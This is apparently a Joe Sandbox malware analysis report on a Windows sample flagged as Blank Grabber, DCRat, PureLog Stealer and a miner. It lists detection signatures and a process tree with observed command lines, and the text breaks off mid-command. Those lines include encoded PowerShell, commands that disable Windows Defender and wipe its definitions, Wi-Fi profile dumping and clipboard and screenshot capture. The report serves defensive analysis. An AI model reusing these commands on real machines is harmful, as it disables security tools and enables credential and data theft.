Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
87Bym0x4Fy.exe

Overview

General Information

Sample name:87Bym0x4Fy.exe
renamed because original name is a hash value
Original sample name:7AA4185295AB3F4F896704AED05C0795.exe
Analysis ID:1485949
MD5:7aa4185295ab3f4f896704aed05c0795
SHA1:3ae4ec10990ff35a466328f1bc0e8ece616df3c3
SHA256:cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected DCRat
Yara detected Discord Rat
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to disable the Task Manager (.Net Source)
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found pyInstaller with non standard icon
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 87Bym0x4Fy.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\87Bym0x4Fy.exe" MD5: 7AA4185295AB3F4F896704AED05C0795)
    • powershell.exe (PID: 7068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeBroker.exe (PID: 6864 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" MD5: A83964F260C28614DA067F6B3DF9E044)
      • RuntimeBroker.exe (PID: 7292 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" MD5: A83964F260C28614DA067F6B3DF9E044)
        • cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Build.exe (PID: 7476 cmdline: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym MD5: A4FE53D7F7F29D0065F8B589A7B61112)
            • hacn.exe (PID: 7684 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)
              • hacn.exe (PID: 7772 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)
                • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • s.exe (PID: 7856 cmdline: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym MD5: E5DB23B3AAF4DDDD2BAF96FB7BBA9616)
                    • svchost.exe (PID: 8052 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)
                      • wscript.exe (PID: 7624 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
                        • cmd.exe (PID: 3236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                          • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • ChainComServermonitor.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
                            • csc.exe (PID: 5448 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                              • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • cvtres.exe (PID: 8004 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                    • setup.exe (PID: 7516 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
            • based.exe (PID: 7704 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 10D45FBCAC1C3CCF126754680E91E0E2)
              • based.exe (PID: 7748 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 10D45FBCAC1C3CCF126754680E91E0E2)
                • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 8128 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 8012 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6008 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7884 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 3668 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7796 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • WMIC.exe (PID: 7824 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                • cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6200 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7368 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 7004 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 6840 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 5000 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • netsh.exe (PID: 6808 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
                • cmd.exe (PID: 3396 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • Conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • systeminfo.exe (PID: 2792 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
                • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 7380 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcAB